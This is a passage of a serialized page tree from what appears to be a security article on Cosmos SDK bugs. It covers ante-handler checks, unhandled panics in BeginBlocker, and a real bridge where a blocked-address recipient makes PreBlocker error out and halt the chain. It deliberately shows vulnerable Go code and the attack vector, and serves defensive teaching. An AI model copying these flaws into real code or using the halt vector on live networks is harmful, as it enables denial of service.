...\n",{"type":28,"tag":116,"props":80431,"children":80432},{"class":245,"line":1957},[80433,80437,80441,80446,80450,80454,80458],{"type":28,"tag":116,"props":80434,"children":80435},{"style":272},[80436],{"type":33,"value":80404},{"type":28,"tag":116,"props":80438,"children":80439},{"style":266},[80440],{"type":33,"value":141},{"type":28,"tag":116,"props":80442,"children":80443},{"style":282},[80444],{"type":33,"value":80445},"NewIncrementSequenceDecorator",{"type":28,"tag":116,"props":80447,"children":80448},{"style":266},[80449],{"type":33,"value":313},{"type":28,"tag":116,"props":80451,"children":80452},{"style":272},[80453],{"type":33,"value":80096},{"type":28,"tag":116,"props":80455,"children":80456},{"style":266},[80457],{"type":33,"value":14840},{"type":28,"tag":116,"props":80459,"children":80460},{"style":250},[80461],{"type":33,"value":80462},"// innermost AnteDecorator\n",{"type":28,"tag":116,"props":80464,"children":80465},{"class":245,"line":1970},[80466],{"type":28,"tag":116,"props":80467,"children":80468},{"style":266},[80469],{"type":33,"value":77135},{"type":28,"tag":116,"props":80471,"children":80472},{"class":245,"line":1987},[80473,80478],{"type":28,"tag":116,"props":80474,"children":80475},{"style":260},[80476],{"type":33,"value":80477},"        default",{"type":28,"tag":116,"props":80479,"children":80480},{"style":266},[80481],{"type":33,"value":5239},{"type":28,"tag":116,"props":80483,"children":80484},{"class":245,"line":2003},[80485,80489,80493,80497,80501,80505,80509],{"type":28,"tag":116,"props":80486,"children":80487},{"style":260},[80488],{"type":33,"value":1017},{"type":28,"tag":116,"props":80490,"children":80491},{"style":272},[80492],{"type":33,"value":25498},{"type":28,"tag":116,"props":80494,"children":80495},{"style":266},[80496],{"type":33,"value":825},{"type":28,"tag":116,"props":80498,"children":80499},{"style":272},[80500],{"type":33,"value":80153},{"type":28,"tag":116,"props":80502,"children":80503},{"style":266},[80504],{"type":33,"value":141},{"type":28,"tag":116,"props":80506,"children":80507},{"style":282},[80508],{"type":33,"value":80162},{"type":28,"tag":116,"props":80510,"children":80511},{"style":266},[80512],{"type":33,"value":3133},{"type":28,"tag":116,"props":80514,"children":80515},{"class":245,"line":31949},[80516,80521,80525,80530,80534,80538,80542,80547,80551,80556,80560,80564],{"type":28,"tag":116,"props":80517,"children":80518},{"style":272},[80519],{"type":33,"value":80520},"                sdkerrors",{"type":28,"tag":116,"props":80522,"children":80523},{"style":266},[80524],{"type":33,"value":141},{"type":28,"tag":116,"props":80526,"children":80527},{"style":282},[80528],{"type":33,"value":80529},"Wrapf",{"type":28,"tag":116,"props":80531,"children":80532},{"style":266},[80533],{"type":33,"value":313},{"type":28,"tag":116,"props":80535,"children":80536},{"style":272},[80537],{"type":33,"value":80191},{"type":28,"tag":116,"props":80539,"children":80540},{"style":266},[80541],{"type":33,"value":141},{"type":28,"tag":116,"props":80543,"children":80544},{"style":272},[80545],{"type":33,"value":80546},"ErrUnknownRequest",{"type":28,"tag":116,"props":80548,"children":80549},{"style":266},[80550],{"type":33,"value":825},{"type":28,"tag":116,"props":80552,"children":80553},{"style":563},[80554],{"type":33,"value":80555},"\"invalid transaction type: %T\"",{"type":28,"tag":116,"props":80557,"children":80558},{"style":266},[80559],{"type":33,"value":825},{"type":28,"tag":116,"props":80561,"children":80562},{"style":272},[80563],{"type":33,"value":78800},{"type":28,"tag":116,"props":80565,"children":80566},{"style":266},[80567],{"type":33,"value":6408},{"type":28,"tag":116,"props":80569,"children":80571},{"class":245,"line":80570},53,[80572,80577],{"type":28,"tag":116,"props":80573,"children":80574},{"style":563},[80575],{"type":33,"value":80576},"                \"transaction is not an SDK tx\"",{"type":28,"tag":116,"props":80578,"children":80579},{"style":266},[80580],{"type":33,"value":3178},{"type":28,"tag":116,"props":80582,"children":80584},{"class":245,"line":80583},54,[80585],{"type":28,"tag":116,"props":80586,"children":80587},{"style":266},[80588],{"type":33,"value":77135},{"type":28,"tag":116,"props":80590,"children":80592},{"class":245,"line":80591},55,[80593],{"type":28,"tag":116,"props":80594,"children":80595},{"style":266},[80596],{"type":33,"value":1954},{"type":28,"tag":116,"props":80598,"children":80600},{"class":245,"line":80599},56,[80601],{"type":28,"tag":116,"props":80602,"children":80603},{"emptyLinePlaceholder":19},[80604],{"type":33,"value":1044},{"type":28,"tag":116,"props":80606,"children":80608},{"class":245,"line":80607},57,[80609,80613,80617,80621,80625,80629,80633,80637,80641],{"type":28,"tag":116,"props":80610,"children":80611},{"style":260},[80612],{"type":33,"value":15405},{"type":28,"tag":116,"props":80614,"children":80615},{"style":282},[80616],{"type":33,"value":79742},{"type":28,"tag":116,"props":80618,"children":80619},{"style":266},[80620],{"type":33,"value":313},{"type":28,"tag":116,"props":80622,"children":80623},{"style":272},[80624],{"type":33,"value":19944},{"type":28,"tag":116,"props":80626,"children":80627},{"style":266},[80628],{"type":33,"value":825},{"type":28,"tag":116,"props":80630,"children":80631},{"style":272},[80632],{"type":33,"value":78800},{"type":28,"tag":116,"props":80634,"children":80635},{"style":266},[80636],{"type":33,"value":825},{"type":28,"tag":116,"props":80638,"children":80639},{"style":272},[80640],{"type":33,"value":79680},{"type":28,"tag":116,"props":80642,"children":80643},{"style":266},[80644],{"type":33,"value":2830},{"type":28,"tag":116,"props":80646,"children":80648},{"class":245,"line":80647},58,[80649],{"type":28,"tag":116,"props":80650,"children":80651},{"style":266},[80652],{"type":33,"value":3025},{"type":28,"tag":116,"props":80654,"children":80656},{"class":245,"line":80655},59,[80657],{"type":28,"tag":116,"props":80658,"children":80659},{"style":266},[80660],{"type":33,"value":406},{"type":28,"tag":29,"props":80662,"children":80663},{},[80664,80666,80671,80673,80680,80681,80688],{"type":33,"value":80665},"Additional examples of incorrect ",{"type":28,"tag":98,"props":80667,"children":80669},{"className":80668},[],[80670],{"type":33,"value":78090},{"type":33,"value":80672}," usage include ",{"type":28,"tag":87,"props":80674,"children":80677},{"href":80675,"rel":80676},"https://jumpcrypto.com/writing/bypassing-ethermint-ante-handlers",[91],[80678],{"type":33,"value":80679},"yet more bypassable checks and loss of funds",{"type":33,"value":10659},{"type":28,"tag":87,"props":80682,"children":80685},{"href":80683,"rel":80684},"https://github.com/cosmos/ibc-go/issues/853",[91],[80686],{"type":33,"value":80687},"incorrect data passing between blockchains",{"type":33,"value":141},{"type":28,"tag":63,"props":80690,"children":80692},{"id":80691},"errors-panics-i-can-handle-it",[80693],{"type":33,"value":80694},"Errors? Panics? I can handle it",{"type":28,"tag":29,"props":80696,"children":80697},{},[80698],{"type":33,"value":80699},"Smart contract developers are used to not properly handling errors. This is acceptable since most underlying blockchains revert all state changes when execution fails.",{"type":28,"tag":29,"props":80701,"children":80702},{},[80703],{"type":33,"value":80704},"Cosmos is designed to provide a similar experience. Whenever some message handler returns an error, changes to the persistent state are dropped. Panics are handled similarly, where a recovery handler is wrapped around the message execution to convert panics into errors for a downstream process.",{"type":28,"tag":29,"props":80706,"children":80707},{},[80708,80710,80716,80718,80723],{"type":33,"value":80709},"This design is pretty neat and allows developers to write code in a rather lazy way. For instance, the following code works perfectly fine. If ",{"type":28,"tag":98,"props":80711,"children":80713},{"className":80712},[],[80714],{"type":33,"value":80715},"k.keeper.TotalReward()",{"type":33,"value":80717}," returns zero, the ",{"type":28,"tag":98,"props":80719,"children":80721},{"className":80720},[],[80722],{"type":33,"value":939},{"type":33,"value":80724}," execution will simply rollback as if nothing has happened.",{"type":28,"tag":234,"props":80726,"children":80728},{"code":80727,"language":75784,"meta":7,"className":75785,"style":7},"func (k msgServer) AllocateReward(\n    goCtx context.Context,\n    msg *types.MsgAllocateReward)\n(*types.MsgAllocatRewardResponse, error) {\n\n    RewardPerShare := k.keeper.Shares() /  k.keeper.TotalReward()\n    k.keeper.DistributeReward(RewardPerShare)\n\n    return &types.MsgAllocateRewardResponse, nil\n}\n",[80729],{"type":28,"tag":98,"props":80730,"children":80731},{"__ignoreMap":7},[80732,80765,80788,80816,80852,80859,80928,80966,80973,81005],{"type":28,"tag":116,"props":80733,"children":80734},{"class":245,"line":246},[80735,80739,80743,80748,80752,80756,80761],{"type":28,"tag":116,"props":80736,"children":80737},{"style":376},[80738],{"type":33,"value":75920},{"type":28,"tag":116,"props":80740,"children":80741},{"style":266},[80742],{"type":33,"value":269},{"type":28,"tag":116,"props":80744,"children":80745},{"style":272},[80746],{"type":33,"value":80747},"k ",{"type":28,"tag":116,"props":80749,"children":80750},{"style":339},[80751],{"type":33,"value":75934},{"type":28,"tag":116,"props":80753,"children":80754},{"style":266},[80755],{"type":33,"value":1609},{"type":28,"tag":116,"props":80757,"children":80758},{"style":282},[80759],{"type":33,"value":80760},"AllocateReward",{"type":28,"tag":116,"props":80762,"children":80763},{"style":266},[80764],{"type":33,"value":3133},{"type":28,"tag":116,"props":80766,"children":80767},{"class":245,"line":256},[80768,80772,80776,80780,80784],{"type":28,"tag":116,"props":80769,"children":80770},{"style":272},[80771],{"type":33,"value":75955},{"type":28,"tag":116,"props":80773,"children":80774},{"style":339},[80775],{"type":33,"value":75960},{"type":28,"tag":116,"props":80777,"children":80778},{"style":266},[80779],{"type":33,"value":141},{"type":28,"tag":116,"props":80781,"children":80782},{"style":339},[80783],{"type":33,"value":75969},{"type":28,"tag":116,"props":80785,"children":80786},{"style":266},[80787],{"type":33,"value":3178},{"type":28,"tag":116,"props":80789,"children":80790},{"class":245,"line":293},[80791,80795,80799,80803,80807,80812],{"type":28,"tag":116,"props":80792,"children":80793},{"style":272},[80794],{"type":33,"value":75981},{"type":28,"tag":116,"props":80796,"children":80797},{"style":370},[80798],{"type":33,"value":9484},{"type":28,"tag":116,"props":80800,"children":80801},{"style":339},[80802],{"type":33,"value":5430},{"type":28,"tag":116,"props":80804,"children":80805},{"style":266},[80806],{"type":33,"value":141},{"type":28,"tag":116,"props":80808,"children":80809},{"style":339},[80810],{"type":33,"value":80811},"MsgAllocateReward",{"type":28,"tag":116,"props":80813,"children":80814},{"style":266},[80815],{"type":33,"value":2830},{"type":28,"tag":116,"props":80817,"children":80818},{"class":245,"line":361},[80819,80823,80827,80831,80835,80840,80844,80848],{"type":28,"tag":116,"props":80820,"children":80821},{"style":266},[80822],{"type":33,"value":313},{"type":28,"tag":116,"props":80824,"children":80825},{"style":370},[80826],{"type":33,"value":4240},{"type":28,"tag":116,"props":80828,"children":80829},{"style":339},[80830],{"type":33,"value":5430},{"type":28,"tag":116,"props":80832,"children":80833},{"style":266},[80834],{"type":33,"value":141},{"type":28,"tag":116,"props":80836,"children":80837},{"style":339},[80838],{"type":33,"value":80839},"MsgAllocatRewardResponse",{"type":28,"tag":116,"props":80841,"children":80842},{"style":266},[80843],{"type":33,"value":825},{"type":28,"tag":116,"props":80845,"children":80846},{"style":339},[80847],{"type":33,"value":974},{"type":28,"tag":116,"props":80849,"children":80850},{"style":266},[80851],{"type":33,"value":844},{"type":28,"tag":116,"props":80853,"children":80854},{"class":245,"line":387},[80855],{"type":28,"tag":116,"props":80856,"children":80857},{"emptyLinePlaceholder":19},[80858],{"type":33,"value":1044},{"type":28,"tag":116,"props":80860,"children":80861},{"class":245,"line":400},[80862,80867,80871,80876,80880,80885,80889,80894,80898,80902,80907,80911,80915,80919,80924],{"type":28,"tag":116,"props":80863,"children":80864},{"style":272},[80865],{"type":33,"value":80866},"    RewardPerShare",{"type":28,"tag":116,"props":80868,"children":80869},{"style":370},[80870],{"type":33,"value":76036},{"type":28,"tag":116,"props":80872,"children":80873},{"style":272},[80874],{"type":33,"value":80875}," k",{"type":28,"tag":116,"props":80877,"children":80878},{"style":266},[80879],{"type":33,"value":141},{"type":28,"tag":116,"props":80881,"children":80882},{"style":272},[80883],{"type":33,"value":80884},"keeper",{"type":28,"tag":116,"props":80886,"children":80887},{"style":266},[80888],{"type":33,"value":141},{"type":28,"tag":116,"props":80890,"children":80891},{"style":282},[80892],{"type":33,"value":80893},"Shares",{"type":28,"tag":116,"props":80895,"children":80896},{"style":266},[80897],{"type":33,"value":13709},{"type":28,"tag":116,"props":80899,"children":80900},{"style":370},[80901],{"type":33,"value":4250},{"type":28,"tag":116,"props":80903,"children":80904},{"style":272},[80905],{"type":33,"value":80906},"  k",{"type":28,"tag":116,"props":80908,"children":80909},{"style":266},[80910],{"type":33,"value":141},{"type":28,"tag":116,"props":80912,"children":80913},{"style":272},[80914],{"type":33,"value":80884},{"type":28,"tag":116,"props":80916,"children":80917},{"style":266},[80918],{"type":33,"value":141},{"type":28,"tag":116,"props":80920,"children":80921},{"style":282},[80922],{"type":33,"value":80923},"TotalReward",{"type":28,"tag":116,"props":80925,"children":80926},{"style":266},[80927],{"type":33,"value":7407},{"type":28,"tag":116,"props":80929,"children":80930},{"class":245,"line":614},[80931,80936,80940,80944,80948,80953,80957,80962],{"type":28,"tag":116,"props":80932,"children":80933},{"style":272},[80934],{"type":33,"value":80935},"    k",{"type":28,"tag":116,"props":80937,"children":80938},{"style":266},[80939],{"type":33,"value":141},{"type":28,"tag":116,"props":80941,"children":80942},{"style":272},[80943],{"type":33,"value":80884},{"type":28,"tag":116,"props":80945,"children":80946},{"style":266},[80947],{"type":33,"value":141},{"type":28,"tag":116,"props":80949,"children":80950},{"style":282},[80951],{"type":33,"value":80952},"DistributeReward",{"type":28,"tag":116,"props":80954,"children":80955},{"style":266},[80956],{"type":33,"value":313},{"type":28,"tag":116,"props":80958,"children":80959},{"style":272},[80960],{"type":33,"value":80961},"RewardPerShare",{"type":28,"tag":116,"props":80963,"children":80964},{"style":266},[80965],{"type":33,"value":2830},{"type":28,"tag":116,"props":80967,"children":80968},{"class":245,"line":631},[80969],{"type":28,"tag":116,"props":80970,"children":80971},{"emptyLinePlaceholder":19},[80972],{"type":33,"value":1044},{"type":28,"tag":116,"props":80974,"children":80975},{"class":245,"line":665},[80976,80980,80984,80988,80992,80997,81001],{"type":28,"tag":116,"props":80977,"children":80978},{"style":260},[80979],{"type":33,"value":393},{"type":28,"tag":116,"props":80981,"children":80982},{"style":370},[80983],{"type":33,"value":6813},{"type":28,"tag":116,"props":80985,"children":80986},{"style":272},[80987],{"type":33,"value":5430},{"type":28,"tag":116,"props":80989,"children":80990},{"style":266},[80991],{"type":33,"value":141},{"type":28,"tag":116,"props":80993,"children":80994},{"style":272},[80995],{"type":33,"value":80996},"MsgAllocateRewardResponse",{"type":28,"tag":116,"props":80998,"children":80999},{"style":266},[81000],{"type":33,"value":825},{"type":28,"tag":116,"props":81002,"children":81003},{"style":376},[81004],{"type":33,"value":76262},{"type":28,"tag":116,"props":81006,"children":81007},{"class":245,"line":713},[81008],{"type":28,"tag":116,"props":81009,"children":81010},{"style":266},[81011],{"type":33,"value":406},{"type":28,"tag":29,"props":81013,"children":81014},{},[81015,81017,81023,81024,81030,81031,81037,81039,81044],{"type":33,"value":81016},"However, the same assumption does not always hold. Certain parts of Cosmos, such as ",{"type":28,"tag":98,"props":81018,"children":81020},{"className":81019},[],[81021],{"type":33,"value":81022},"PreBlocker",{"type":33,"value":825},{"type":28,"tag":98,"props":81025,"children":81027},{"className":81026},[],[81028],{"type":33,"value":81029},"BeginBlocker",{"type":33,"value":6159},{"type":28,"tag":98,"props":81032,"children":81034},{"className":81033},[],[81035],{"type":33,"value":81036},"EndBlocker",{"type":33,"value":81038},", are not protected by the error handling mechanism. So, if we move the reward distribution logic into ",{"type":28,"tag":98,"props":81040,"children":81042},{"className":81041},[],[81043],{"type":33,"value":81029},{"type":33,"value":81045}," to automatically distribute rewards at the start of each block, panics raised by division by 0 will halt the chain.",{"type":28,"tag":234,"props":81047,"children":81049},{"code":81048,"language":75784,"meta":7,"className":75785,"style":7},"func BeginBlocker(ctx context.Context, keeper keeper.Keeper) error {\n\n    RewardPerShare := keeper.Shares() /  keeper.TotalReward()\n    keeper.DistributeReward(RewardPerShare)\n\n return nil\n}\n",[81050],{"type":28,"tag":98,"props":81051,"children":81052},{"__ignoreMap":7},[81053,81118,81125,81173,81201,81208,81220],{"type":28,"tag":116,"props":81054,"children":81055},{"class":245,"line":246},[81056,81060,81065,81069,81073,81077,81081,81085,81089,81093,81098,81102,81106,81110,81114],{"type":28,"tag":116,"props":81057,"children":81058},{"style":376},[81059],{"type":33,"value":75920},{"type":28,"tag":116,"props":81061,"children":81062},{"style":282},[81063],{"type":33,"value":81064}," BeginBlocker",{"type":28,"tag":116,"props":81066,"children":81067},{"style":266},[81068],{"type":33,"value":313},{"type":28,"tag":116,"props":81070,"children":81071},{"style":272},[81072],{"type":33,"value":19944},{"type":28,"tag":116,"props":81074,"children":81075},{"style":339},[81076],{"type":33,"value":75960},{"type":28,"tag":116,"props":81078,"children":81079},{"style":266},[81080],{"type":33,"value":141},{"type":28,"tag":116,"props":81082,"children":81083},{"style":339},[81084],{"type":33,"value":75969},{"type":28,"tag":116,"props":81086,"children":81087},{"style":266},[81088],{"type":33,"value":825},{"type":28,"tag":116,"props":81090,"children":81091},{"style":272},[81092],{"type":33,"value":80884},{"type":28,"tag":116,"props":81094,"children":81095},{"style":339},[81096],{"type":33,"value":81097}," keeper",{"type":28,"tag":116,"props":81099,"children":81100},{"style":266},[81101],{"type":33,"value":141},{"type":28,"tag":116,"props":81103,"children":81104},{"style":339},[81105],{"type":33,"value":79564},{"type":28,"tag":116,"props":81107,"children":81108},{"style":266},[81109],{"type":33,"value":1609},{"type":28,"tag":116,"props":81111,"children":81112},{"style":339},[81113],{"type":33,"value":974},{"type":28,"tag":116,"props":81115,"children":81116},{"style":266},[81117],{"type":33,"value":1291},{"type":28,"tag":116,"props":81119,"children":81120},{"class":245,"line":256},[81121],{"type":28,"tag":116,"props":81122,"children":81123},{"emptyLinePlaceholder":19},[81124],{"type":33,"value":1044},{"type":28,"tag":116,"props":81126,"children":81127},{"class":245,"line":293},[81128,81132,81136,81140,81144,81148,81152,81156,81161,81165,81169],{"type":28,"tag":116,"props":81129,"children":81130},{"style":272},[81131],{"type":33,"value":80866},{"type":28,"tag":116,"props":81133,"children":81134},{"style":370},[81135],{"type":33,"value":76036},{"type":28,"tag":116,"props":81137,"children":81138},{"style":272},[81139],{"type":33,"value":81097},{"type":28,"tag":116,"props":81141,"children":81142},{"style":266},[81143],{"type":33,"value":141},{"type":28,"tag":116,"props":81145,"children":81146},{"style":282},[81147],{"type":33,"value":80893},{"type":28,"tag":116,"props":81149,"children":81150},{"style":266},[81151],{"type":33,"value":13709},{"type":28,"tag":116,"props":81153,"children":81154},{"style":370},[81155],{"type":33,"value":4250},{"type":28,"tag":116,"props":81157,"children":81158},{"style":272},[81159],{"type":33,"value":81160},"  keeper",{"type":28,"tag":116,"props":81162,"children":81163},{"style":266},[81164],{"type":33,"value":141},{"type":28,"tag":116,"props":81166,"children":81167},{"style":282},[81168],{"type":33,"value":80923},{"type":28,"tag":116,"props":81170,"children":81171},{"style":266},[81172],{"type":33,"value":7407},{"type":28,"tag":116,"props":81174,"children":81175},{"class":245,"line":361},[81176,81181,81185,81189,81193,81197],{"type":28,"tag":116,"props":81177,"children":81178},{"style":272},[81179],{"type":33,"value":81180},"    keeper",{"type":28,"tag":116,"props":81182,"children":81183},{"style":266},[81184],{"type":33,"value":141},{"type":28,"tag":116,"props":81186,"children":81187},{"style":282},[81188],{"type":33,"value":80952},{"type":28,"tag":116,"props":81190,"children":81191},{"style":266},[81192],{"type":33,"value":313},{"type":28,"tag":116,"props":81194,"children":81195},{"style":272},[81196],{"type":33,"value":80961},{"type":28,"tag":116,"props":81198,"children":81199},{"style":266},[81200],{"type":33,"value":2830},{"type":28,"tag":116,"props":81202,"children":81203},{"class":245,"line":387},[81204],{"type":28,"tag":116,"props":81205,"children":81206},{"emptyLinePlaceholder":19},[81207],{"type":33,"value":1044},{"type":28,"tag":116,"props":81209,"children":81210},{"class":245,"line":400},[81211,81215],{"type":28,"tag":116,"props":81212,"children":81213},{"style":260},[81214],{"type":33,"value":52484},{"type":28,"tag":116,"props":81216,"children":81217},{"style":376},[81218],{"type":33,"value":81219}," nil\n",{"type":28,"tag":116,"props":81221,"children":81222},{"class":245,"line":614},[81223],{"type":28,"tag":116,"props":81224,"children":81225},{"style":266},[81226],{"type":33,"value":406},{"type":28,"tag":75,"props":81228,"children":81230},{"id":81229},"real-world-examples-3",[81231],{"type":33,"value":76309},{"type":28,"tag":29,"props":81233,"children":81234},{},[81235],{"type":33,"value":81236},"Recently, developers have become increasingly aware of unprotected ABCI functions, but this doesn't stop DoS bugs from manifesting. So what is the catch?",{"type":28,"tag":29,"props":81238,"children":81239},{},[81240,81242,81248,81250,81255,81257,81263,81265,81271,81273,81279],{"type":33,"value":81241},"The problem lies in the lack of proper understanding of utility functions. The example here implements a bridge that mints wrapped BTC tokens in the PreBlocker when bridging events are observed. Notably, errors returned by ",{"type":28,"tag":98,"props":81243,"children":81245},{"className":81244},[],[81246],{"type":33,"value":81247},"bankKeeper.SendCoinsFromModuleToAccount",{"type":33,"value":81249}," will be bubbled up through ",{"type":28,"tag":98,"props":81251,"children":81253},{"className":81252},[],[81254],{"type":33,"value":81022},{"type":33,"value":81256}," and halt the chain. It turns out an attacker can force ",{"type":28,"tag":98,"props":81258,"children":81260},{"className":81259},[],[81261],{"type":33,"value":81262},"SendCoinsFromModuleToAccount",{"type":33,"value":81264}," to return an error by setting ",{"type":28,"tag":98,"props":81266,"children":81268},{"className":81267},[],[81269],{"type":33,"value":81270},"recipient",{"type":33,"value":81272}," to some ",{"type":28,"tag":98,"props":81274,"children":81276},{"className":81275},[],[81277],{"type":33,"value":81278},"BlockedAddr",{"type":33,"value":81280},",rendering the code susceptible to DoS attacks.",{"type":28,"tag":29,"props":81282,"children":81283},{},[81284],{"type":28,"tag":87,"props":81285,"children":81288},{"href":81286,"rel":81287},"https://github.com/mezo-org/mezod/blob/d3b1a049a9acce977fdadd245cb381252f101922/x/bridge/keeper/assets_locked.go#L170",[91],[81289],{"type":33,"value":76359},{"type":28,"tag":234,"props":81291,"children":81293},{"code":81292,"language":75784,"meta":7,"className":75785,"style":7},"func (pbh *PreBlockHandler) PreBlocker() sdk.PreBlocker {\n    return func(\n        ctx sdk.Context,\n        req *cmtabci.RequestFinalizeBlock,\n    ) (*sdk.ResponsePreBlock, error) {\n        ...\n        err := pbh.bridgeKeeper.AcceptAssetsLocked(ctx, events)\n        if err != nil {\n            return nil, fmt.Errorf(\"cannot accept AssetsLocked events: %w\", err)\n        }\n        ...\n    }\n}\n\nfunc (k Keeper) AcceptAssetsLocked(\n    ctx sdk.Context,\n    events types.AssetsLockedEvents,\n) error {\n    ...\n    for _, event := range events {\n        recipient, err := sdk.AccAddressFromBech32(event.Recipient)\n        if err != nil {\n            return fmt.Errorf(\"failed to parse recipient address: %w\", err)\n        }\n\n        if bytes.Equal(event.TokenBytes(), sourceBTCToken) {\n            err = k.mintBTC(ctx, recipient, event.Amount)\n            if err != nil {\n                return fmt.Errorf(\n                    \"failed to mint BTC for event %v: %w\",\n                    event.Sequence,\n                    err,\n                )\n            }\n        } else {\n            ...\n        }\n    }\n    ...\n}\n\nfunc (k Keeper) mintBTC(\n    ctx sdk.Context,\n    recipient sdk.AccAddress,\n    amount math.Int,\n) error {\n    ...\n    err = k.bankKeeper.SendCoinsFromModuleToAccount(\n        ctx,\n        types.ModuleName,\n        recipient,\n        coins,\n    )\n    if err != nil {\n        return fmt.Errorf(\"failed to send coins: %w\", err)\n    }\n    ...\n}\n",[81294],{"type":28,"tag":98,"props":81295,"children":81296},{"__ignoreMap":7},[81297,81350,81365,81388,81418,81454,81462,81518,81542,81592,81599,81606,81613,81620,81627,81658,81681,81706,81721,81728,81764,81818,81841,81882,81889,81896,81947,82008,82031,82054,82066,82087,82099,82107,82114,82129,82137,82144,82151,82158,82165,82172,82203,82226,82251,82276,82291,82298,82335,82346,82367,82378,82390,82397,82420,82460,82467,82474],{"type":28,"tag":116,"props":81298,"children":81299},{"class":245,"line":246},[81300,81304,81308,81313,81317,81322,81326,81330,81334,81338,81342,81346],{"type":28,"tag":116,"props":81301,"children":81302},{"style":376},[81303],{"type":33,"value":75920},{"type":28,"tag":116,"props":81305,"children":81306},{"style":266},[81307],{"type":33,"value":269},{"type":28,"tag":116,"props":81309,"children":81310},{"style":272},[81311],{"type":33,"value":81312},"pbh ",{"type":28,"tag":116,"props":81314,"children":81315},{"style":370},[81316],{"type":33,"value":4240},{"type":28,"tag":116,"props":81318,"children":81319},{"style":339},[81320],{"type":33,"value":81321},"PreBlockHandler",{"type":28,"tag":116,"props":81323,"children":81324},{"style":266},[81325],{"type":33,"value":1609},{"type":28,"tag":116,"props":81327,"children":81328},{"style":282},[81329],{"type":33,"value":81022},{"type":28,"tag":116,"props":81331,"children":81332},{"style":266},[81333],{"type":33,"value":13709},{"type":28,"tag":116,"props":81335,"children":81336},{"style":339},[81337],{"type":33,"value":78350},{"type":28,"tag":116,"props":81339,"children":81340},{"style":266},[81341],{"type":33,"value":141},{"type":28,"tag":116,"props":81343,"children":81344},{"style":339},[81345],{"type":33,"value":81022},{"type":28,"tag":116,"props":81347,"children":81348},{"style":266},[81349],{"type":33,"value":1291},{"type":28,"tag":116,"props":81351,"children":81352},{"class":245,"line":256},[81353,81357,81361],{"type":28,"tag":116,"props":81354,"children":81355},{"style":260},[81356],{"type":33,"value":393},{"type":28,"tag":116,"props":81358,"children":81359},{"style":376},[81360],{"type":33,"value":79628},{"type":28,"tag":116,"props":81362,"children":81363},{"style":266},[81364],{"type":33,"value":3133},{"type":28,"tag":116,"props":81366,"children":81367},{"class":245,"line":293},[81368,81372,81376,81380,81384],{"type":28,"tag":116,"props":81369,"children":81370},{"style":272},[81371],{"type":33,"value":25841},{"type":28,"tag":116,"props":81373,"children":81374},{"style":339},[81375],{"type":33,"value":78261},{"type":28,"tag":116,"props":81377,"children":81378},{"style":266},[81379],{"type":33,"value":141},{"type":28,"tag":116,"props":81381,"children":81382},{"style":339},[81383],{"type":33,"value":75969},{"type":28,"tag":116,"props":81385,"children":81386},{"style":266},[81387],{"type":33,"value":3178},{"type":28,"tag":116,"props":81389,"children":81390},{"class":245,"line":361},[81391,81396,81400,81405,81409,81414],{"type":28,"tag":116,"props":81392,"children":81393},{"style":272},[81394],{"type":33,"value":81395},"        req",{"type":28,"tag":116,"props":81397,"children":81398},{"style":370},[81399],{"type":33,"value":9484},{"type":28,"tag":116,"props":81401,"children":81402},{"style":339},[81403],{"type":33,"value":81404},"cmtabci",{"type":28,"tag":116,"props":81406,"children":81407},{"style":266},[81408],{"type":33,"value":141},{"type":28,"tag":116,"props":81410,"children":81411},{"style":339},[81412],{"type":33,"value":81413},"RequestFinalizeBlock",{"type":28,"tag":116,"props":81415,"children":81416},{"style":266},[81417],{"type":33,"value":3178},{"type":28,"tag":116,"props":81419,"children":81420},{"class":245,"line":387},[81421,81425,81429,81433,81437,81442,81446,81450],{"type":28,"tag":116,"props":81422,"children":81423},{"style":266},[81424],{"type":33,"value":79696},{"type":28,"tag":116,"props":81426,"children":81427},{"style":370},[81428],{"type":33,"value":4240},{"type":28,"tag":116,"props":81430,"children":81431},{"style":339},[81432],{"type":33,"value":78350},{"type":28,"tag":116,"props":81434,"children":81435},{"style":266},[81436],{"type":33,"value":141},{"type":28,"tag":116,"props":81438,"children":81439},{"style":339},[81440],{"type":33,"value":81441},"ResponsePreBlock",{"type":28,"tag":116,"props":81443,"children":81444},{"style":266},[81445],{"type":33,"value":825},{"type":28,"tag":116,"props":81447,"children":81448},{"style":339},[81449],{"type":33,"value":974},{"type":28,"tag":116,"props":81451,"children":81452},{"style":266},[81453],{"type":33,"value":844},{"type":28,"tag":116,"props":81455,"children":81456},{"class":245,"line":400},[81457],{"type":28,"tag":116,"props":81458,"children":81459},{"style":370},[81460],{"type":33,"value":81461},"        ...\n",{"type":28,"tag":116,"props":81463,"children":81464},{"class":245,"line":614},[81465,81470,81474,81479,81483,81488,81492,81497,81501,81505,81509,81514],{"type":28,"tag":116,"props":81466,"children":81467},{"style":272},[81468],{"type":33,"value":81469},"        err",{"type":28,"tag":116,"props":81471,"children":81472},{"style":370},[81473],{"type":33,"value":76036},{"type":28,"tag":116,"props":81475,"children":81476},{"style":272},[81477],{"type":33,"value":81478}," pbh",{"type":28,"tag":116,"props":81480,"children":81481},{"style":266},[81482],{"type":33,"value":141},{"type":28,"tag":116,"props":81484,"children":81485},{"style":272},[81486],{"type":33,"value":81487},"bridgeKeeper",{"type":28,"tag":116,"props":81489,"children":81490},{"style":266},[81491],{"type":33,"value":141},{"type":28,"tag":116,"props":81493,"children":81494},{"style":282},[81495],{"type":33,"value":81496},"AcceptAssetsLocked",{"type":28,"tag":116,"props":81498,"children":81499},{"style":266},[81500],{"type":33,"value":313},{"type":28,"tag":116,"props":81502,"children":81503},{"style":272},[81504],{"type":33,"value":19944},{"type":28,"tag":116,"props":81506,"children":81507},{"style":266},[81508],{"type":33,"value":825},{"type":28,"tag":116,"props":81510,"children":81511},{"style":272},[81512],{"type":33,"value":81513},"events",{"type":28,"tag":116,"props":81515,"children":81516},{"style":266},[81517],{"type":33,"value":2830},{"type":28,"tag":116,"props":81519,"children":81520},{"class":245,"line":631},[81521,81525,81529,81533,81538],{"type":28,"tag":116,"props":81522,"children":81523},{"style":260},[81524],{"type":33,"value":2943},{"type":28,"tag":116,"props":81526,"children":81527},{"style":272},[81528],{"type":33,"value":48142},{"type":28,"tag":116,"props":81530,"children":81531},{"style":370},[81532],{"type":33,"value":64006},{"type":28,"tag":116,"props":81534,"children":81535},{"style":376},[81536],{"type":33,"value":81537}," 